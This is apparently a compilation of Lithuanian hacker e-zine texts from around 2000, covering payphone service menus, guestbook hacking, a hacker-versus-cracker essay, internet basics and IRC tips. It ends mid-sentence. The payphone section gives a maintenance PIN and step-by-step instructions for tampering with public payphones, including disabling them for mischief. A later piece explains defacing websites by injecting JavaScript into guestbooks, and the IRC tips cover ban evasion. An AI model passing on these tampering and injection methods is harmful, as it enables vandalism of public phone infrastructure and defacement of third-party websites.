Meniu susideda ish opciju, kurias pasirinkus ieinama i kitus submeniu (gylesnio lygio meniu), parodoma tam tikra informacija arba atliekamos tam tikros operacijos.

Pagrindinis meniu

Pagrindinis meniu turi 6 opcijas, kurios pasirenkamos klavishais {7} arba {9}

Sekanti opcija pasirenkama klavishu {9}, priesh tai buvusi – {7}.

Pagrindinio meniu opcijos:

[SETTINGS ]

parametru meniu

[COMMISSIONING ]

prijungimo prie tinklo meniu

[DECOMMISSIONING ]

atjungimo nuo tinklo meniu

[MAINTENANCE ]

informacija ir testavimas

[CHANGE BATTERY ]

bateriju keitimas

[SOFT INFOS ]

skambucziu statistika

I kiekviena opcija ieinama paspaudus klavisha {0}, o isheinama i aukshtesnio lygio meniu (shiuo atveju – pagrindini meniu) paspaudus klavisha {8}

1. Opcija SETTINGS (parametru meniu)

Iejus i shia opcija {0} galima matyti ir keisti kai kuriuos taksofono parametrus. Virshutineje eiluteje rodomas parametro pavadinimas, o apatineje – einamoji parametro reikshme, kuria galima keisti. Parametrai pasirenkami klavishais {9} arba {7}. Parametru reikshmes keicziamos taip pat klavishu {0}

Parametrai:

1.1 DIAL MODE parametras – nustato numerio rinkimo buda ir gali buti:

[DIAL MODE : ]

[LDD (PULSE) ]

pulsinis rinkimas arba

[DIAL MODE : ]

[MFD (DTMF) ]

toninis rinkimas

1.2 CHARGING MODE parametras – nustato pokalbio apmokestinimo buda ir gali buti:

[CHARGING MODE : ]

[TARIF TABLE ]

pagal tarifu lentele arba

[CHARGING MODE : ]

[METER PULSES ]

skaicziuojant pulsus

1.3 CALL START CRITERIA parametras – nustato pokalbio pradzhios pozhymi ir gali buti:

[CALL START CRITERIA:]

[POLARITY REVERSAL ]

poliarishkumo pasikeitimas arba

[CALL START CRITERIA:]

[METER PULSES ]

skaicziuojant pulsus

1.4 INCOMING CALLS parametras – nustato ar leisti ieinanczius skambuczius ir gali buti:

[INCOMING CALLS ]

[ALLOWED ]

i taksofona paskambunti galima arba

[INCOMING CALLS ]

[NOT ALLOWED ]

i taksofona paskambinti negalima.

1.5 DEFAULT LANGUAGE parametras – nustato pagrindine taksofono tarnybiniu praneshimu kalba ir gali buti:

[DEFAULT LANGUAGE : ]

[LITHUANIAN ]

lietuviu arba

[DEFAULT LANGUAGE : ]

[ENGLISH ]

anglu

Nepaisant shio parametro, pats meniu visada bus rodomas anglu kalba.

1.6 LINE CURRENT parametras:

[LINE CURENT : 37mA ] – tel. linijos sroves stiprumas mikroamperais

[BATTERY TO PLUG: YES] – parodo, ar galimas maitinimas nuo bateriju

Shio parametro negalima keisti ir jis yra informacinio pobudzhio

1.7 – 1.10 Garso parametrai decibelais:

1.7

[MICRO GAIN DELTA : ] – mikrofono

[ 0 dB ]

1.8

[DTMF GAIN DELTA : ] – toninio rinkimo

[ 0 dB ]

1.9

[MODEM GAIN DELTA : ] – modemo

[ 0 dB ]

1.10

[EARPHONE GAIN DELTA:] – ausines

[ 0 dB ]

Shiuos parametrus galima keisti klavishais {NEXT CALL} – padidinti ir

{NEXT CARD} – sumazhinti.

NEXT CALL klavishas – treczias ish virshaus kaireje eileje

NEXT CARD klavishas – apatinis kaireje eileje

2.Opcija COMMISSIONING – taksofono ijungimo i tinkla parametrai:

2.1.PAYPHONE ID parametras – numeris, kuriuo shis taksofonas figuruoja tinkle.

[PAYPHONE ID : ]

[27320914 # ]

Kauno apskrityje shis numeris yra ir taksofono telefono numeris:

27 – Kauno kodas, 320914 – numeris

Vilniuje taksofono numeracija kiek kitokia

2.2.REMAS PHONE NUMBER parametras – stoties, kuri aptarnauja shi taksofonu tinkla telefono numeris. Juo taksofonas susisiekia su stotimi vykdant ijungimo i tinkla ar ishjungimo ish tinklo funkcijas

[REMAS PHONE NUMBER:]

[360660 ]

Shiaip paskambinus shiuo numeriu ishgirsite modemo tona.

2.3.COMMISSIONING meniu punktas vykdo taksofono ijungimo i tinkla funkcija

[COMMISSIONING (#) ]

Funkcijos ivykdymui reikia paspausti {#}. Ekrane pasirodo uzhrashas

[COMMISSIONING ]

[IN PROGRESS… ]

ir ragelyje girdisi kaip taksofonas renka REMAS numeri ir paskui modemas perduoda informacija

3.Opcija DECOMMISSIONING – taksofono ishjungimas ish tinklo. Iejus i ja matome tik viena meniu punkta:

3.1. DECOMMISSIONING meniu punktas – vykdo taksofono ishjungimo ish tinklo funkcija

[DECOMMISSIONING(#)]

Funkcijos ivykdymui reikia paspausti {#}. Funkcija veikia analogishkai

COMMISSIONING funkcijai, tik informacijos perdavimas vyksta trumpiau.

4.Opcija MAINTENANCE – informacija ir testavimas

Punktai:

4.1.SOFTWARE RELEASE

VXX.XX # (02.07)

4.2.PARAMETERS

VXX.XX # (00.01)

4.3.CARDS ACCEPTANCE

VXX.XX # (01.11)

4.4.CALL CATEGORIES

VXX.XX # (01.36)

4.5.TT INT. NUMBERS

VXX.XX # (01.36)

4.6.TT NAT. NUMBERS

VXX.XX # (01.36)

4.7.TT DAYS

VXX.XX # (01.36)

4.8.TT SCHEDULES

VXX.XX # (01.36)

4.9.TT TARIFFS

VXX.XX # (01.36)

4.10.TT MEANS OF PAYMENT

VXX.XX # (00.00)

Parodo taksofono programines irangos versiju numerius. Shiu parametru ish klaviaturos pakeisti negalima.

4.11.DATE/TIME punktas – parodo einanczia data ir laika:

[DATE : 99/05/31 ] – data

[TIME : 09:11:23 ] – laikas

4.12.- 4.20 punktai – Taksofono testai

4.12

LCD ekrano testas

4.13

4.14 Ragelio testas – Taksofonas patikrina ragelio veikima.

4.15 Mygtuku testas

[PUSH KEY 1 ] Analogishkai patikrinami visi mygtukai

po kurio pasirodo uzhrashas

[PAYPHONE COMPARTMENT]

[ACCESS(39) ]

4.16 Korteles testas

[INSERT A CHIP CARD ]

[THEN PRESS # ]

Ikishus kortele ir paspaudus {#} pamatome uzhtasha

[DEBIT ONE UNIT (#) ]

Dabar paspaudus {#} taksofonas nuims nuo korteles viena kredita

4.17. Kalibravimas.

[INSERT A CHIP CARD ]

[START CALIBRATION(#)]

Idejus kortele ir paspaudus {#} taksofonas atlieka kalibravima

4.18. ANTIWIRING’o testas , reikalinga „WIRE” kortele.

[INSERT A WIRE CARD ]

[TEST ANTIWIRING (#)]

Paspaudus {#} taksofonas atlieka testa.

4.18. Slotu Testas – patikrina lizdus ishpletimo blokams

Testas atliekamas automatishkai:

[SMTEST ]

[IN PROGRESS… ]

o atlikus testa pasirodo rezultatai:

[SLOT1 : SM 6506 ] – pirmame lizde modulis 6506

[SLOT2 : BAD SM ] – antras lizdas tushczias

4.19. Ryshio su telefono stotimi patikrinimas:

[REMAS CONNECTION ]

Paspaudus {#} taksofonas renka REMAS numeri ir ragelije girdimi modemo garsai

[CONNECTION ]

[IN PROGRESS… ]

sekmingai atlikus shi testa pasirodo uzhrashas

[SUCCESFUL TRANSMIS.]

5. Opcija BATTERY CHANGE – skirta bateriju pakeitimui ir turi tik viena punkta:

[CHANGE THE BATTERY ]

[THEN PRESS # ]

6.Opcija SOFT INFOS – skambucziu statistika.

Siame skyriuje issaugoma 30 (00-29) is taksofono rinktu numeriu.

Kartu issaugojama data ir laikas. Pvz:

[(00) 0 X 02000002 ]

[ 05/15 17:58 ]

Turekite omeny, kad telefono numeriai saugomi ne deshimtainiu formatu, o greicziausia sheshioliktainiu, tixliai nezhinau, neturejau laiko nagrineti, kol rashiau shi trumpa failiuka, tad jums teks patiems tai ishsiaishkinti 🙂

Ishejimui ish meniu reikia isheiti ish submeniu i pagrendini meniu klavisho

{8} pagalba, pagrindiniame meniu taip pat paspausti {8} ir pasirodzhius uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ]

[LOCAL MAINTENANCE? ]

patvirtinti savo pasirinkima klavishu {#}.

Pasirodzhius praneshimui

[HANG UP, CLOSE THE ]

[DOOR AND REMOVE CARD]

padeti rageli.

O dabar, kaip tuo pasinaudoti praktishkai?

Pvz.1:

Jus stovite Kaune, Laisves alejoje ir jums zhutbut reikia aptarti viena reikala su draugeliu, kuris dabar yra namuose, jusu mobiliako akumas nusedes, o taksofono korteleje liko tik vienas kreditas…

Isheitis – tegul jusu draugelis perskambina jums i taksofona.

Bet Laisves alejoje nei ant vieno taksofono nera uzhrashytas jo numeris, o dauguma Kauno taksofonu neleidzhia i juos paskambinti…

Taigi, jus einate prie artimiausio taksofono. Jums reikia suzhinoti jo numeri ir atblokuoti ieinancziojo ryshi funkcija:

1.) Pakeliate kairiji taksofono kampa ir matote pin kodo uzhklausima

[PIN CODE ? : ]

2.) Ivedate pin koda: {3707} ir matote pirmaja opcija:

[SETTINGS ]

3.) Ieinate i submeniu paspaudus klavisha {0} ir matote submeniu punkta:

[DIAL MODE : ]

[MFD (DTMF) ] – czia gali buti ir PULSE uzhrashas

4.) „Prasukate” meniu su klavishu {9} per 3 punktus (spaudzhiate ji 3 kartus)

kol ekrane pasirodys meniu punktas

[INCOMING CALLS ]

[NOT ALLOWED ]

5.) Pakeicziate shi parametra paspaude klavisha {0} ir matote:

[INCOMING CALLS ]

[ALLOWED ]

Dabar i shi taksofona galima paskambinti. Jeigu parametras ALLOWED

jau buvo nustatytas jums iejus i shi meniu punkta, vadinasi jums pasiseke ir nieko czia keisti nereikia . Abiem atvejais, isheiname i pagrindini meniu klavishu {8} ir vel matome opcija

[SETTINGS ]

6.) „Prasukate” pagrindini meniu su klavishu {9} viena karta, kol ekrane pasirodo opcija

[COMMISSIONING ]

Ieinate i ja su klavishu {0} ir ishkart matote parametra

[PAYPHONE ID : ]

[27320914 # ]

Taigi, czia ir yra taksofono telefono numeris, kur 27 – Kauno kodas, o 320914 – numeris.

7.) Isheinate i pagrindini meniu paspaude {8}, vel spaudzhiate {8}.

ir pasirodzhius uzhklausimui, ar jus tikrai norite isheiti,

[EXIT FROM THE ]

[LOCAL MAINTENANCE? ]

patvirtinkite savo pasirinkima klavishu {#}.

Pasirodzhius praneshimui

[HANG UP, CLOSE THE ]

[DOOR AND REMOVE CARD]

padekite rageli. Dabar su jusu vieninteliu kreditu skambinate savo draugeliui ir prashote, kad perskambintu telefonu, kuri jus matete ekrane (musu pavizdyje – 320914, arba jeigu jusu draugelis yra kitame mieste –

8-27-320914) ir padeje rageli laukiate skambuczio. Suskambejus taksofonui, pakeliate rageli ir kalbates 🙂 Jusu pokalbio metu ekranas atrodys taip:

[IEINANTIS RYSYS ]

o jusu draugeliui uzh pokalbi teks moketi tiek pat, kiek skambinant iprastu telefono numeriu.

Pvz.2:

Jums ish chuliganishku ar kitokiu paskatu reikia, kad niekas ishskirus jus negaletu paskambinti ish tam tikro taksofono :). Jums tereikia atjugti shi taksofona nuo tinklo (kitais zhodzhiais – uzhblokuoti ji):

1.) Ieinate i taksofono meniu kaip nurodyta pirmame pavizdyje ir ishsirenkate opcija

[DECOMMISSIONING ]

2.) Ieinate i ja su klavishu {0} ir pamate

[DECOMMISSIONING (#)]

Spaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri ir modemu perduoda informacija. Tuo metu ekrane matote

[DECOMMISSIONING ]

[IN PROGRESS… ]

Kai taksofonas baigia informacijos perdavima, ekrane pasirodo:

[DECOMMISSIONING ]

[OK ]

3.) Dabar jus galite isheiti ish meniu kaip nurodyta pirmame pavizdyje ir padeti rageli. Po to, kai jus atjungete taksofona nuo tinklo, bet kas, norintis paskambinti ish shio taksofono matys ekrane uzhrasha

[TIK SPEC. TARNYBU ]

[NUMERIAI ]

ir negales paskambinit jokiu numeriu ishskirus 01, 02, 03, 04 🙂

Noredami patys paskambinti, jus turesite vel ijungti shi taksofona i tinkla:

1.) Ieinate i taksofono meniu ir pasirenkate opcija

[COMMISSIONING ]

2.) Ieinate i ja klavishu {0} , prasukate meniu su {9} kol ekrane pasirodys punktas

[COMMISSIONING (#) ]

ir paspaudzhiate {#}. Ragelyje girdisi, kaip taksofonas renka REMAS numeri ir modemu perduoda informacija. Tuo metu ekrane matote:

[COMMISSIONING ]

[IN PROGRESS… ]

Informacijos perdavimas gali uzhtrukti keleta minicziu, o kai baigiasi, ekrane matome

[COMMISSIONING ]

[OK ]

Taksofonas ijungtas i tinkla 🙂

Jeigu kazhkas netvarkoj (pvz. klaidingai nustatyti taksofono parametrai)

arba informacijos perdavimas nepavyko, pasirodo uzhrashas

[COMMISSIONING ]

[NOT OK ]

Tada nustatykite tinkamus parametrus ir bandykite dar karta.

3.) Sekmingai atlike prijungimo funkcija, isheikite ish meniu kaip nurodyta pirmame pvz. ir padekite rageli. Dabar galite skambinti.

Na ir dar vienas patarimas priesh pabaiga – butu nebloga ideja, priesh zhaidzhiant su taksofono meniu, nusirashyti, kaip buvo nustatyti visi kintami parametrai, kad prireikus juos butu galima atstatyti. Mes juk nenorime, kad mieste neliktu nei vieno veikianczio taksofono 🙂

PABAIGOS ZHODIS: Prie viso to reiktu pazhymeti, kad ash asmenishkai nesu telefonistas o czia pateikta informacija gauta praktiniu bandymu budu, todel gali pasitaikyti netikslumu ar neaishkumu.

Jeigu jus turite kokiu nors pastebejimu ar galite pridurti ka nors daugiau, jusu komentarai ir pasiulymai visada laukiami. Su manimi galite susisiekti adresu: ww0lf@pogrindis.net

Knowledge is power!

ww0lf

-Pabaiga-

eof

17. Ouestbook hack

Puslapio hakinimas per guestbook’a Shtai dar vienas budas nuhakinti web puslapius! Taip buvo nuhakintas ir jaunimas.net ir daug kitu… Kai kurie rimtesni saitai turi apsauga nuo to bet daugumas tiesiog palieka likimo valiai!

Tai va zhodziu viska ka tau reikia padaryti tai nueiti i ta puslapi su guest book’u ir parashyti vietoje tavo : „Sveiki man labai patiko jusu puslapis ir t.t.” 🙂 turiu omeni atsilepimu skiltie ar panashiai rashai tiesiog JavaScripta ir nieko daugiau > gali padaryti nuoroda i puslapi ir pan.

Tai va zhodzhiu veikimo prinsipas yra toks kad kai irashai guestbooko teksta jis tiesiogiai ji irasho i savo html > nu jei html tai html tu jam duodi Java scripta ir viskas :))) Shtai keli java scripto pavyzdzhiai: Shi funkcija ishmes langeli su OK knopke kurioje bus tekstas : „HAc|{eD By Craft[Eye]” O shis paklaus ar tau 18 metu ir nuves i tam tikra puslapi 🙂 Na tai tiek 🙂 Kaip ash visada sakau Happy Hacking! Craft[Eye] – CraftEye@gmx.net

18. Hackeriai pries crackerius

Kas yra hackeris?

Hackeris- jis turi išmanyti kompiuteryje.

Turi mokėti programuoti,nes be programavimo nelabai ką ir pahakins

Turi mokėti kalbas anglu ir rusu.

Neskubėti,visus savo veiksmus gerai apgalvoti.

Daug atiduoti pinigu už ineta 🙂

Niekada neturi galvoti, kad kas nors žino už jį daugiau ar mažiau, turi galvoti, kad žino mažiausiai ir reikia tobulintis.

Kuo skiriasi hackeris nuo Crackerio?

Hackeris – žmogus,kuris domisi įvairiomis operacinėmis sistemomis, jų klaidomis,dažnai programuotojas.

Hackeriai dažnai sugalvoja būdus kaip įsilaužti,dažnai jie gerai išmano technika.

Jie žino sistemos skyles ir ieško nauju.

Crackeris yra žmogus kuris daug išmanydamas apie „ineta”, ir tinklus griauna apsaugos sistemas.Tai būdavo žmogus iššifruojantis užkoduota infa.

bet dabar Crackeriai įsilaužinėja į kitus kompus,su skirtingais tikslais:

Prisijunkti,sunaikinti infa, perskaityti ją, gauti passwordus ir t.t

Hackeriai dažnai naudojasi Crackeriu sukurtomis programomis,

Kad patikrintų tinklo saugumą ir t.t

Skirtumas yra toks,kad viskas ką crackeriai daro yra nelegalu.

Crackeriai niekada neišnyks, nes juk jau tokia žmogaus prigimtis naikinti viską kas sukurta.

Skeletaz

2000

19. Internet Hack

Lapkritis ‘Y2K

~23:00 val.

Kadangi esu tik begineriz(o gal tik sumautaz lameriz), taj kol kas mano txt’aj informaciniaj.. na galbut atejz lajkaz, ir me sukurpz ka norz ql… na bet kol kas tenkisnimes ir tuo… Tajp kad shis txt yra TIK informaciniz.. ajshq kajp ir visi kiti :))

Hi, na taj kajp ejnasi?… oj, ne apie taj juk ash turechiau.. ajshq dabar kajp visada nuo CraftEye gausiu pzd… kad kol isivazhiuoju nesamoniu priplepu ir vis apie alu varau.. ;]] oky oky.. No alko now.. jau buvo diena alko dabar ne.. :)) o dabar nesimiega.. yra chrustiq ir kavoz..na taj apie ka ten mes.. o tajp apie Internet’a .. hmmm… o kas taj yra… gal su uogiene taj kramtoma..

Patiko chia presh kokiuz metuz kazhkokia radijos stotiz uzhdavine klausyma:

„Kas yra Internetas”.. oj tada taj prisiklausiaj visokiu sapaliojimu.Apie taj kad I’netaz, taj begalo DIDELIZ ir galingas kompiuteris, arba kad taj palydovas.. 🙂 Na manau, per metuz liaudiz jau daugiau apie taj suzhinojo.

So just read… sorry, kad be lietuvybez, dar nesusikonfiguravau mandrake’o.

Internet[pagal A.Petrovskij, B. Leontjev „Efektinvnij haking”]

Internet’az – taj didzhiausiaz kompiuteriniz tinklaz pasaulyje jungiantis begalo daug kompiuteriu ivajriausiajz metodajz nuo telefoniniu liniju iki palydovinio ryshio sistemu. Internet’e naudojamas protokolas TCP/IP, qriz savyje turi”

# IP(Internet protokol) – tarptinklinis protokolaz, kuris prizhiuri transliacija be jokiu papildomo tvarkymo perduodant duomenis ish vieno ompiuterio kitam.

# UDP(User Datagram Protocol) – vartojishkas datagram’inis protokolas, aptarnaujantis transliacija atskiru praneshimu, IP pagalba, be klaidu tikrinimo.

#TCP(Transmissin Control Protocol) – perdavima kontroliuojantis protokolas, aptarnaujantis transliacija IP pagalba tikrinantis susijungima.

Kiekvienas kompiuteriz , prijungtas prie I’neto gauna savo IP adresa.

Iternet’o adresa yra 4 bajtu dydzhio ir susideda ish dvieju daliu: tinklo ir kompiuterio. Pirma dalis rejshkia logini tinkla, kuriam paskirtas adresas.

Antra dalis identifikuoja konkriachiaj ta kompiuteri tinkle.

Pagal susitarima, IP adresas yra ish skaijchiu ishkirtu tashkajz.pvz:

196.219.31.12

~~DNS~~

DNS(Domain Name System) – taj duomenu base, qri lajko informacija apie kompiuteriuz,qrie yra ijungti i I’neta. Duomenu tipas priklauso nuo kompiuterio, bet dazhniausiai taj IP adresas ir duomenys marshrutizacijaj.

Patogumo delej, daugelis kompiuteriu turi savo vardus, pvz:

Jonas, Petryte.. just jokin’ :)))

DNS vykdo keleta uzhduochiu, bet pagrindine jos uzhduotis pertvarkyti kompiuteriu vardus i IP ir atgal. DNS erdve atrodo kajp domenu medis, artejanchiajz prie medzhio shaknu. Medshio shaknys turi varda, po ja ejna domenaj aukshtesnio lajpsnio(shakniez domenaj). Egzituoja dvi rushys aukshto lajpsnio domenaj. USA aukshchiausio vajzduoja arganizacijos struktura.

Ir kajp tajsykle turi triju rajdzhiu varduz:

# .gov – valdzhios istajgoz

# .mil – karines istajgoz

# .com – komercines organizacijos

# .net – tinklo paslaugu tiekejaj

# .org – Ne pelno siekenchios organizacijos

# .edu – moxlo istajgoz

Del domenu uzh USA ribu susijusiu su teritorijos pasiskirstimu naudojami vardaj ish dvieju rajdzhiu. pvz:

hakeriai.voras.lt – Lietuvoje(kazhi apie ka chia?:)

www.porno.ru – Rusija (geraz sajtaz beje 🙂

~~~Darbaz I’nete~~~

Na ajshq jej turi I’net’a taj ir gali kazhka jame daryti, tam yra rejkalingos programoz, shtaj keletaz ish ju:

# ping – lejdzhia nustatyti lajka paketo nuejimo iki hosto. [kazhqr girdejau kad ne vien tam pinginimaz yra naudojamz :]

# traceroute – parodo praejnanchiu paketu kelia kelia tinkle(Sux95 ir SuxNT –

tracert.exe)

# nslookup – lejdzhia perzhiureti DNS serveriu palajkima

# telnet – Nustato sujusijungima su nutolusiu kompiuteriu(23 portas) ir lejdzhia dirbti nutolusio terminalo rezhime

# ftp – lejdzhia kejstis fajlajz naudojant FTP(File Transfer Protocol)

protokola(21 portas)

# finger – parodo informacija apie vartotojus dirbanchius tinkle.

Darbuj su WWW(World Wide Web) naudojamos programos Netscape Navigator vs

Internet Explorer, etc. Shioz programoz jungiasi su serveriu(80 portas) ir dirba su protokolu HTTP.

Na ka ir viskaz.. shiaj nakchiaj tiek… dabar tex sustot su txt. linux’u ir viskuo kitu :((( Ne ne ne vyrukaj su juodajz drabuzhiajz beldzhiasi i duriz, bet arteja, ne ne ir ne apokalipse… o sumauta sesija… ech… na o po to palajma – 4T0$T0G0Z.. what’z ql.. .bu lajko viskam, i think so..

Shi txt galima lajsvaj platinti, bet NIEKO nekejsti.

Kadangi tikraj nemanau, kad shis txt yra idealuz, taj laukiu patajsymu ir klajdu tajsymu, bej pasiulymu y-majl: j-azz@centras.lt

J-azz

#Ne, ash – ne hackeriz, tiesiog blogai miegojau…#

20. Keletas irc pamokeliu

ﾉﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍｻ

ｺ … keletas IRC pamokeliu by mr2 … ｺ

ﾈﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍﾍｼ

„Communications without intelligence is noise;

Intelligence without communications is irrelevant.”

ﾉﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｻ

ｳ <<< turinys >>> ｳ

ﾈﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｼ

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[1]] tau uzdejo bana … o tau nors verk reikia ｳ

ｳ patekt i ta kanala 😉 ｳ

ｳ [[2]] hmm … neturiu jokio *IRC (nej mIRC … ｳ

ｳ nej pIRC … zodziu jokio) o tajp nera laiko ｳ

ｳ ji parsisiust ir tajp reikia pasikalbet ;((( ｳ

ｳ [[3]] kaip pasidaryti savo script ? (trumpai) ｳ

ｳ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ｳ

ｳ atjungiam chiuwaka ? (ir kajp nuo to paciam ｳ

ｳ apsisaugot) ｳ

ｳ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

ﾉﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｻ

ｳ <<< textas >>> ｳ

ﾈﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｼ

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[1]] tau uzdejo bana … o tau nors verk reikia ｳ

ｳ patekt i ta kanala 😉 ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

reikalas tame kad kartais (shiaip apie 30% atveju (gal biski daugiau … gal maziau)) jei jums kokiame taj kanle uzdejo bana … norint patekt i ta kanla uztenka :

1) pasikeist nick’a arba …

2) Options/Connect/Identd/ … User ID: langelyje pakeist UserId duomenis … (kad suveiktu reikia diskonektintis ir vel konektintis) jei nepavyko lieka trechias (tikraj nepaskutinis) …

3) (sis galima sakyt ish 2-ju daliu susidarantis punktas priklauso dazniausiaj nuo to ka jus prisidirbot tame kanale) reiskias parasot

„/names [#kanalo pavadinimas]” paziurit nick’us su op’ais (priesajs nick’a @ pvz : @agurkaz) ir paprasot jo nuimt bana … pvz :

„/msg agurkaz plz nuimk bana [#kanalo_pav] kanale arba „/notice [#kanalas] nuimkit bana or smth”

(shiuo atveju zhinute gaus visi esantys kanale)

o kitas varijantas : jei kanalas kuriame gavot +b sedi nedidelis skaicius zmoniu … taj paprastaj nepraeina neij pora minuciu kaip nuimamas banas … nes tokiuose kanaluose paprasciausiai reikalinga liaudis kad ir kokia ji bebutu …

tam kad ten sedetu (rkp belaukian ar dar del kokiunors kitu priezasciu) … 😉

(beabejo galima pasinaudoti proxi servu paslaugom …

bet apie taj chia nerashysiu (ir tajp jau daug kas yra prirase apie proxius …))

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[2]] hmm … neturiu jokio *IRC (nej mIRC … ｳ

ｳ nej pIRC … zodziu jokio) o tajp nera laiko ｳ

ｳ ji parsisiust ir tajp reikia pasikalbet ;((( ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

kagi tokiu atveju daryt ? ogi tu kaijp speju sedi prie windozes ? 😉 taj kokios problemos ? spaudi start/run (arba win_klavisa+r) ir i langeli irashaj „telnet” be ->”<- … (reiketu nueit i terminal/preferences ir nusistatyt telnet’a … bet shikart ne apie taj … padarysit taj ir be mano pagalbos) tajgi pagrindiniam lange spaudi connect/remote system … ir chia pvz :

host name : irc.omnitel.net port : 6667

term type : vt100

spaudi connect … ir lauki kol pagrindiniam lange vietoj „(none)” musu atveju pamatysi :

„irc.omnitel.net” … tada rasaj „user a a a a”

butinaj 4-ri (dabar neaiskinsiu kas taj) [enter]

tada rashaij „nick [jusu nick’as]” [enter] …

tada laukiat kol servas ishmes „ping [ir chia kaskox skaicius]” … toliau rasai „pong [chia rasaij ta skaiciu kuri gavaj ish servo]” … ir jus jau prisijunge 😉 … toliau galit rasyt jau iprastas komandas kaip „join #mr2” (taip … taip … chia komandos rasomos be „/”) … tiesa jus susidursit su viena problemele : chia norink kaska pasakyt pvz :

i kanala #mr2 reikia rasyt „privmsg #mr2 [jusu zinute]”

(patarciau parasyt „help” [enter] ir paziuret visas komandas … nes kajp jau supratot nevisos komandos tokios pacios kajp pvz: mIRC’e … (zodziu kas iesko

… tas randa) na o sedintiems po *NIX sistema manau nebus sunku padaryti tapati 😉

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[3]] kaip pasidaryti savo script ? (trumpai) ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

taip taip taip … patikekit manim yra zymiai maloniau tureti savo paties parasyta script (kaj zinaj smulkiausias jo ipatybes) nej pasikliauti gana daznaj backdorus turinchiais skriptajs … (shiaip man neteko su tokiu script turet reikalu … bet ju yra …) tiesiog parsisiuskit ircintro.hlp bei mirc.hlp … (shie helpaj paprastaj buna kartu su pachiu mIRC’u) na dar galite parsisiust numeric.hlp

… kurio praktiskaj neprireiks pradedanchiam skript-kiddie … taj pradziai … toliau kaij suprasit pagrindus patarciau parsisiusti keleta jau padarytu skriptu … addon’u pvz : ish www.mircscripts.com …

www.mircx.com … ir dar dauk panasiu saijtu …

neslepsiu kad didele dali agurkaz-script parasiau zvilkteledamas i kitu skriptus … pvz : „warmaster”

(savo laiku pac geriausias … nors jau pasenes yra daug zmoniu visdar ji naudojanciu) … tiesa i savo script neidejau ji ishgarsinusio TAKEOVER … shiaip del kurio yra teke matyt autobana gaunanciu chiuvaku bandanciu uzeijt i viena ar kita kanala … (vien delto kad naudoja warmaster’i) … ir begale kitu naujesniu ir netgi senesniu (juose kartajs net lengviau susigaudyt nej naujuosiuose …) skriptu kaip „matrix” „stigmata” ir t.t. (tiesa nepatariu siustis didelia apimti uzimanciu skriptu nes juose paprastaj be *.waw *.mp3 failiuku nieko gero ir nera … (atejtyje galbut parasysiu ir detalesni script’u darymo tutorial’a (na jej bus norinciu))

